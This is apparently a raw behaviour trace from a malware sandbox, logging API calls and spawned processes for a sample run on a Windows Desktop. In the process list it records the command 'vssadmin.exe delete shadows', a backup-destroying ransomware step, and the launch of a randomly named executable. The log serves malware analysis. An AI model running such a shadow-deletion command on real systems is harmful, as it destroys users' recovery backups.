_wcsicmp (_String1="message", _String2="POPD") returned -3 [0194.855] _wcsicmp (_String1="message", _String2="ASSOC") returned 12 [0194.855] _wcsicmp (_String1="message", _String2="FTYPE") returned 7 [0194.855] _wcsicmp (_String1="message", _String2="BREAK") returned 11 [0194.855] _wcsicmp (_String1="message", _String2="COLOR") returned 10 [0194.855] _wcsicmp (_String1="message", _String2="MKLINK") returned -6 [0194.855] _wcsicmp (_String1="message", _String2="FOR") returned 7 [0194.855] _wcsicmp (_String1="message", _String2="IF") returned 4 [0194.855] _wcsicmp (_String1="message", _String2="REM") returned -5 [0194.857] ??_V@YAXPAX@Z () returned 0x1 [0194.857] GetProcessHeap () returned 0x7c0000 [0194.858] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0xffd6) returned 0x7c8da8 [0194.860] GetProcessHeap () returned 0x7c0000 [0194.860] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x22) returned 0x7c7a40 [0194.860] _wcsnicmp (_String1="mess", _String2="cmd ", _MaxCount=0x4) returned 10 [0194.860] malloc (_Size=0xffce) returned 0x8e25d8 [0194.860] ??_V@YAXPAX@Z () returned 0x4ff4a4 [0194.861] GetProcessHeap () returned 0x7c0000 [0194.861] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x1ffa4) returned 0x7d8d88 [0194.866] SetErrorMode (uMode=0x0) returned 0x0 [0194.866] SetErrorMode (uMode=0x1) returned 0x0 [0194.866] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x7d8d90, lpFilePart=0x4ff4c4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x4ff4c4*="Desktop") returned 0x17 [0194.866] SetErrorMode (uMode=0x0) returned 0x1 [0194.866] GetProcessHeap () returned 0x7c0000 [0194.866] RtlReAllocateHeap (Heap=0x7c0000, Flags=0x0, Ptr=0x7d8d88, Size=0x52) returned 0x7d8d88 [0194.866] GetProcessHeap () returned 0x7c0000 [0194.867] RtlSizeHeap (HeapHandle=0x7c0000, Flags=0x0, MemoryPointer=0x7d8d88) returned 0x52 [0194.867] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xeff840, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0194.867] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0194.867] GetProcessHeap () returned 0x7c0000 [0194.867] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x1b4) returned 0x7c7a70 [0194.867] GetProcessHeap () returned 0x7c0000 [0194.867] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x360) returned 0x7c7c30 [0195.085] GetProcessHeap () returned 0x7c0000 [0195.085] RtlReAllocateHeap (Heap=0x7c0000, Flags=0x0, Ptr=0x7c7c30, Size=0x1b6) returned 0x7c7c30 [0195.085] GetProcessHeap () returned 0x7c0000 [0195.085] RtlSizeHeap (HeapHandle=0x7c0000, Flags=0x0, MemoryPointer=0x7c7c30) returned 0x1b6 [0195.085] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xeff840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0195.085] GetProcessHeap () returned 0x7c0000 [0195.085] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0xe0) returned 0x7c7df0 [0195.085] GetProcessHeap () returned 0x7c0000 [0195.085] RtlReAllocateHeap (Heap=0x7c0000, Flags=0x0, Ptr=0x7c7df0, Size=0x76) returned 0x7c7df0 [0195.086] GetProcessHeap () returned 0x7c0000 [0195.086] RtlSizeHeap (HeapHandle=0x7c0000, Flags=0x0, MemoryPointer=0x7c7df0) returned 0x76 [0195.086] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0195.087] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\message.html", fInfoLevelId=0x1, lpFindFileData=0x4ff270, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4ff270) returned 0x7c7e70 [0195.219] GetProcessHeap () returned 0x7c0000 [0195.220] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x0, Size=0x14) returned 0x7c4810 [0195.220] FindClose (in: hFindFile=0x7c7e70 | out: hFindFile=0x7c7e70) returned 1 [0195.220] _wcsicmp (_String1=".html", _String2=".CMD") returned 5 [0195.220] _wcsicmp (_String1=".html", _String2=".BAT") returned 6 [0195.220] ??_V@YAXPAX@Z () returned 0x1 [0195.220] GetConsoleTitleW (in: lpConsoleTitle=0x4ff754, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\SYSTEM32\\cmd.exe") returned 0x1c [0195.771] InitializeProcThreadAttributeList (in: lpAttributeList=0x4ff680, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x4ff66c | out: lpAttributeList=0x4ff680, lpSize=0x4ff66c) returned 1 [0195.771] UpdateProcThreadAttribute (in: lpAttributeList=0x4ff680, dwFlags=0x0, Attribute=0x60001, lpValue=0x4ff668, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x4ff680, lpPreviousValue=0x0) returned 1 [0195.772] GetStartupInfoW (in: lpStartupInfo=0x4ff6b8 | out: lpStartupInfo=0x4ff6b8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x8c, hStdOutput=0x428, hStdError=0x43c)) [0195.772] GetProcessHeap () returned 0x7c0000 [0195.772] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x18) returned 0x7c46f8 [0195.772] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0195.772] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0195.772] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0195.772] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0195.772] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0195.772] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0195.772] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0195.772] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0195.773] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0195.773] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0195.773] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0195.773] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0195.773] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0195.773] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0195.773] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0195.773] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0195.773] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0195.773] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0195.773] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0195.774] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0195.774] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0195.774] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0195.774] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0195.774] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0195.774] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0195.774] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0195.774] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0195.774] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0195.774] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0195.774] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0195.774] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0195.774] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0195.775] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0195.775] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0195.775] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0195.775] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0195.775] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0195.775] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0195.775] GetProcessHeap () returned 0x7c0000 [0195.775] RtlFreeHeap (HeapHandle=0x7c0000, Flags=0x0, BaseAddress=0x7c46f8) returned 1 [0195.775] GetProcessHeap () returned 0x7c0000 [0195.775] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0xa) returned 0x7c46f8 [0195.776] lstrcmpW (lpString1="\\message.html", lpString2="\\XCOPY.EXE") returned -1 [0195.778] _get_osfhandle (_FileHandle=1) returned 0x428 [0195.778] SetConsoleMode (hConsoleHandle=0x428, dwMode=0x0) returned 0 [0195.779] _get_osfhandle (_FileHandle=0) returned 0x8c [0195.779] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1f7) returned 1 [0196.286] CreateProcessW (in: lpApplicationName="C:\\Users\\FD1HVy\\Desktop\\message.html", lpCommandLine="message.html", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x4ff608*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="message.html", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4ff654 | out: lpCommandLine="message.html", lpProcessInformation=0x4ff654*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0196.299] GetLastError () returned 0xc1 [0196.299] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0196.299] GetProcessHeap () returned 0x7c0000 [0196.299] RtlFreeHeap (HeapHandle=0x7c0000, Flags=0x0, BaseAddress=0x7c6ca0) returned 1 [0196.299] GetEnvironmentStringsW () returned 0x7c6ca0* [0196.300] GetProcessHeap () returned 0x7c0000 [0196.300] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0xb1a) returned 0x7c4c18 [0196.300] FreeEnvironmentStringsA (penv="=") returned 1 [0196.300] ApiSetQueryApiSetPresence () returned 0x0 [0196.300] ResolveDelayLoadedAPI () returned 0x702118c0 [0196.901] ShellExecuteWorker () returned 0x1 [0250.304] GetProcessHeap () returned 0x7c0000 [0250.305] RtlFreeHeap (HeapHandle=0x7c0000, Flags=0x0, BaseAddress=0x7c46f8) returned 1 [0250.305] DeleteProcThreadAttributeList (in: lpAttributeList=0x4ff680 | out: lpAttributeList=0x4ff680) [0250.305] ??_V@YAXPAX@Z () returned 0x1 [0250.306] _get_osfhandle (_FileHandle=1) returned 0x428 [0250.306] SetConsoleMode (hConsoleHandle=0x428, dwMode=0x0) returned 0 [0250.307] _get_osfhandle (_FileHandle=1) returned 0x428 [0250.308] GetConsoleMode (in: hConsoleHandle=0x428, lpMode=0xf03890 | out: lpMode=0xf03890) returned 0 [0250.308] _get_osfhandle (_FileHandle=0) returned 0x8c [0250.308] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0xf03894 | out: lpMode=0xf03894) returned 1 [0250.901] _get_osfhandle (_FileHandle=0) returned 0x8c [0250.901] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1e7) returned 1 [0251.511] SetConsoleInputExeNameW () returned 0x1 [0251.512] GetConsoleOutputCP () returned 0x1b5 [0251.893] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf03850 | out: lpCPInfo=0xf03850) returned 1 [0251.893] SetThreadUILanguage (LangId=0x0) returned 0x280409 [0252.442] exit (_Code=0) [0252.443] ??_V@YAXPAX@Z () returned 0x1 Thread: id = 138 os_tid = 0xdb4 Thread: id = 156 os_tid = 0x13f8 Thread: id = 161 os_tid = 0x13f0 Thread: id = 162 os_tid = 0x125c Thread: id = 163 os_tid = 0x1398 Thread: id = 164 os_tid = 0x1300 Process: id = "9" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x5e029000" os_pid = "0xe58" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0x1f4" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f8ee" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 31 os_tid = 0x6d0 Thread: id = 32 os_tid = 0x9a4 Thread: id = 35 os_tid = 0xa68 Process: id = "10" image_name = "vssadmin.exe" filename = "c:\\windows\\syswow64\\vssadmin.exe" page_root = "0x1dd6c000" os_pid = "0xe1c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x1280" cmd_line = "vssadmin.exe delete shadows" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f8ee" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 38 os_tid = 0xf08 Thread: id = 139 os_tid = 0xfd4 Thread: id = 140 os_tid = 0x4ac Process: id = "11" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x53452000" os_pid = "0x3b4" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "rpc_server" parent_id = "3" os_parent_pid = "0x244" cmd_line = "C:\\WINDOWS\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wisvc" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\WpnService" [0xa], "NT SERVICE\\wuauserv" [0xa], "S-1-5-80-603222039-1779857981-708438124-1730083285-3435298639" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:00009ec9" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 39 os_tid = 0xde0 Thread: id = 40 os_tid = 0xd5c Thread: id = 41 os_tid = 0xcfc Thread: id = 42 os_tid = 0xf84 Thread: id = 43 os_tid = 0x84 Thread: id = 44 os_tid = 0xdb8 Thread: id = 45 os_tid = 0xdc4 Thread: id = 46 os_tid = 0xd2c Thread: id = 47 os_tid = 0x360 Thread: id = 48 os_tid = 0x12ec Thread: id = 49 os_tid = 0xfc0 Thread: id = 50 os_tid = 0x1140 Thread: id = 51 os_tid = 0x1134 Thread: id = 52 os_tid = 0x1310 Thread: id = 53 os_tid = 0x1230 Thread: id = 54 os_tid = 0x1240 Thread: id = 55 os_tid = 0x1220 Thread: id = 56 os_tid = 0x11b8 Thread: id = 57 os_tid = 0x394 Thread: id = 58 os_tid = 0xd48 Thread: id = 59 os_tid = 0x1018 Thread: id = 60 os_tid = 0x1004 Thread: id = 61 os_tid = 0x13a4 Thread: id = 62 os_tid = 0x1354 Thread: id = 63 os_tid = 0x1350 Thread: id = 64 os_tid = 0x134c Thread: id = 65 os_tid = 0x1334 Thread: id = 66 os_tid = 0x132c Thread: id = 67 os_tid = 0x1330 Thread: id = 68 os_tid = 0x1324 Thread: id = 69 os_tid = 0x12a0 Thread: id = 70 os_tid = 0x1298 Thread: id = 71 os_tid = 0x1294 Thread: id = 72 os_tid = 0x1290 Thread: id = 73 os_tid = 0x128c Thread: id = 74 os_tid = 0x1288 Thread: id = 75 os_tid = 0x127c Thread: id = 76 os_tid = 0x11bc Thread: id = 77 os_tid = 0x10e4 Thread: id = 78 os_tid = 0x10e0 Thread: id = 79 os_tid = 0x10d8 Thread: id = 80 os_tid = 0xf34 Thread: id = 81 os_tid = 0xf28 Thread: id = 82 os_tid = 0x9c4 Thread: id = 83 os_tid = 0x9ac Thread: id = 84 os_tid = 0x95c Thread: id = 85 os_tid = 0x930 Thread: id = 86 os_tid = 0x908 Thread: id = 87 os_tid = 0x8e4 Thread: id = 88 os_tid = 0x87c Thread: id = 89 os_tid = 0x878 Thread: id = 90 os_tid = 0x86c Thread: id = 91 os_tid = 0x858 Thread: id = 92 os_tid = 0x804 Thread: id = 93 os_tid = 0x654 Thread: id = 94 os_tid = 0x650 Thread: id = 95 os_tid = 0x7c4 Thread: id = 96 os_tid = 0x7d4 Thread: id = 97 os_tid = 0x7cc Thread: id = 98 os_tid = 0x7fc Thread: id = 99 os_tid = 0x794 Thread: id = 100 os_tid = 0x750 Thread: id = 101 os_tid = 0x790 Thread: id = 102 os_tid = 0x748 Thread: id = 103 os_tid = 0x62c Thread: id = 104 os_tid = 0x6c0 Thread: id = 105 os_tid = 0x688 Thread: id = 106 os_tid = 0x670 Thread: id = 107 os_tid = 0x5a0 Thread: id = 108 os_tid = 0x648 Thread: id = 109 os_tid = 0x614 Thread: id = 110 os_tid = 0x434 Thread: id = 111 os_tid = 0x7c8 Thread: id = 112 os_tid = 0x7b0 Thread: id = 113 os_tid = 0x764 Thread: id = 114 os_tid = 0x728 Thread: id = 115 os_tid = 0x6e8 Thread: id = 116 os_tid = 0x6d8 Thread: id = 117 os_tid = 0x678 Thread: id = 118 os_tid = 0x668 Thread: id = 119 os_tid = 0x658 Thread: id = 120 os_tid = 0x634 Thread: id = 121 os_tid = 0x5b0 Thread: id = 122 os_tid = 0x54c Thread: id = 123 os_tid = 0x43c Thread: id = 124 os_tid = 0x41c Thread: id = 125 os_tid = 0x418 Thread: id = 126 os_tid = 0x414 Thread: id = 127 os_tid = 0x404 Thread: id = 128 os_tid = 0x390 Thread: id = 129 os_tid = 0x3a4 Thread: id = 130 os_tid = 0x33c Thread: id = 131 os_tid = 0x374 Thread: id = 132 os_tid = 0x358 Thread: id = 133 os_tid = 0x188 Thread: id = 134 os_tid = 0x23c Thread: id = 135 os_tid = 0x274 Thread: id = 136 os_tid = 0x294 Thread: id = 137 os_tid = 0x3b8 Thread: id = 208 os_tid = 0x114c Thread: id = 209 os_tid = 0x848 Thread: id = 210 os_tid = 0x11d4 Thread: id = 211 os_tid = 0x760 Thread: id = 212 os_tid = 0x458 Thread: id = 213 os_tid = 0x1204 Process: id = "12" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x5cb9a000" os_pid = "0xfb0" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "11" os_parent_pid = "0x2ac" cmd_line = "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:0008cb9e" [0xc000000f] Thread: id = 141 os_tid = 0x1050 Thread: id = 142 os_tid = 0x204 Thread: id = 143 os_tid = 0xf58 Thread: id = 144 os_tid = 0xa8c Thread: id = 145 os_tid = 0xb4 Thread: id = 146 os_tid = 0xcc8 Thread: id = 147 os_tid = 0xf5c Thread: id = 148 os_tid = 0x1064 Thread: id = 158 os_tid = 0x13f4 Process: id = "13" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x1ffdb000" os_pid = "0x9d0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x1224" cmd_line = "\"cmd.exe\" /c qq3d1t429055.exe" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f8ee" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 149 os_tid = 0x1158 [0206.035] GetModuleHandleA (lpModuleName=0x0) returned 0xed0000 [0206.035] __set_app_type (_Type=0x1) [0206.035] __p__fmode () returned 0x74ff3c14 [0206.035] __p__commode () returned 0x74ff49ec [0206.035] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xee6fd0) returned 0x0 [0206.036] __getmainargs (in: _Argc=0xefd1a4, _Argv=0xefd1a8, _Env=0xefd1ac, _DoWildCard=0, _StartInfo=0xefd1b8 | out: _Argc=0xefd1a4, _Argv=0xefd1a8, _Env=0xefd1ac) returned 0 [0206.036] _onexit (_Func=0xee8030) returned 0xee8030 [0206.037] _onexit (_Func=0xee8040) returned 0xee8040 [0206.037] _onexit (_Func=0xee8050) returned 0xee8050 [0206.038] _onexit (_Func=0xee8060) returned 0xee8060 [0206.038] _onexit (_Func=0xee8070) returned 0xee8070 [0206.039] _onexit (_Func=0xee8080) returned 0xee8080 [0206.040] GetCurrentThreadId () returned 0x1158 [0206.040] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x1158) returned 0xb4 [0206.040] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x73b80000 [0206.040] GetProcAddress (hModule=0x73b80000, lpProcName="SetThreadUILanguage") returned 0x73b94f70 [0206.041] SetThreadUILanguage (LangId=0x0) returned 0x3080409 [0206.862] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0206.862] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x32ffcfc | out: phkResult=0x32ffcfc*=0x0) returned 0x2 [0206.863] VirtualQuery (in: lpAddress=0x32ffd07, lpBuffer=0x32ffcb4, dwLength=0x1c | out: lpBuffer=0x32ffcb4*(BaseAddress=0x32ff000, AllocationBase=0x3200000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0206.863] VirtualQuery (in: lpAddress=0x3200000, lpBuffer=0x32ffcb4, dwLength=0x1c | out: lpBuffer=0x32ffcb4*(BaseAddress=0x3200000, AllocationBase=0x3200000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0206.863] VirtualQuery (in: lpAddress=0x3201000, lpBuffer=0x32ffcb4, dwLength=0x1c | out: lpBuffer=0x32ffcb4*(BaseAddress=0x3201000, AllocationBase=0x3200000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0206.863] VirtualQuery (in: lpAddress=0x3203000, lpBuffer=0x32ffcb4, dwLength=0x1c | out: lpBuffer=0x32ffcb4*(BaseAddress=0x3203000, AllocationBase=0x3200000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0206.863] VirtualQuery (in: lpAddress=0x3300000, lpBuffer=0x32ffcb4, dwLength=0x1c | out: lpBuffer=0x32ffcb4*(BaseAddress=0x3300000, AllocationBase=0x3300000, AllocationProtect=0x2, RegionSize=0xc5000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0206.863] GetConsoleOutputCP () returned 0x1b5 [0207.397] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf03850 | out: lpCPInfo=0xf03850) returned 1 [0207.397] SetConsoleCtrlHandler (HandlerRoutine=0xef7260, Add=1) returned 1 [0207.398] _get_osfhandle (_FileHandle=1) returned 0x3d8 [0207.398] GetConsoleMode (in: hConsoleHandle=0x3d8, lpMode=0xf0388c | out: lpMode=0xf0388c) returned 0 [0207.398] _get_osfhandle (_FileHandle=0) returned 0x8c [0207.398] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0xf03888 | out: lpMode=0xf03888) returned 1 [0207.835] _get_osfhandle (_FileHandle=1) returned 0x3d8 [0207.835] SetConsoleMode (hConsoleHandle=0x3d8, dwMode=0x0) returned 0 [0207.835] _get_osfhandle (_FileHandle=1) returned 0x3d8 [0207.835] GetConsoleMode (in: hConsoleHandle=0x3d8, lpMode=0xf03890 | out: lpMode=0xf03890) returned 0 [0207.836] _get_osfhandle (_FileHandle=0) returned 0x8c [0207.836] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0xf03894 | out: lpMode=0xf03894) returned 1 [0208.347] _get_osfhandle (_FileHandle=0) returned 0x8c [0208.347] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1e7) returned 1 [0209.284] GetEnvironmentStringsW () returned 0x36a4c20* [0209.284] GetProcessHeap () returned 0x36a0000 [0209.284] RtlAllocateHeap (HeapHandle=0x36a0000, Flags=0x8, 